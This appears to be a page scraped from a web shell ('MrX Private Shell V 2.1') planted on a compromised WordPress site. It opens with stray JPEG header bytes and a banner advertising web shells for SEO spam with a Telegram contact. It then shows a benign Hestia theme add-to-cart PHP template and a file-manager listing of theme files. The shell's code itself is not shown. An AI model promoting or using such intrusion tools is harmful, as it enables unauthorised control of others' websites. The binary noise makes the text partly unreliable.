����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Custom add to cart for the homepage shop section.
*
* @package Hestia
* @since Hestia 1.0
*/
if ( ! defined( 'ABSPATH' ) ) {
exit;
}
global $product;
if ( function_exists( 'method_exists' ) && method_exists( $product, 'get_id' ) ) {
$prod_id = $product->get_id();
} else {
$prod_id = $product->id;
}
hestia_load_fa();
echo apply_filters(
'woocommerce_loop_add_to_cart_link',
sprintf(
'<a rel="nofollow" href="%1$s" data-quantity="%2$s" data-product_id="%3$s" data-product_sku="%4$s" class="%5$s btn btn-just-icon btn-simple btn-default" title="%6$s"><i rel="tooltip" data-original-title="%6$s" class="fas fa-cart-plus"></i></a>',
esc_url( $product->add_to_cart_url() ),
esc_attr( isset( $quantity ) ? $quantity : 1 ),
esc_attr( $prod_id ),
esc_attr( $product->get_sku() ),
esc_attr( isset( $class ) ? $class : 'button' ),
esc_attr( $product->add_to_cart_text() )
),
$product,
$args
);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| add-to-cart.php | File | 928 B | 0644 |
|
| class-hestia-woocommerce-header-manager.php | File | 8.42 KB | 0644 |
|
| functions.php | File | 15.89 KB | 0644 |
|
| hooks.php | File | 1.97 KB | 0644 |
|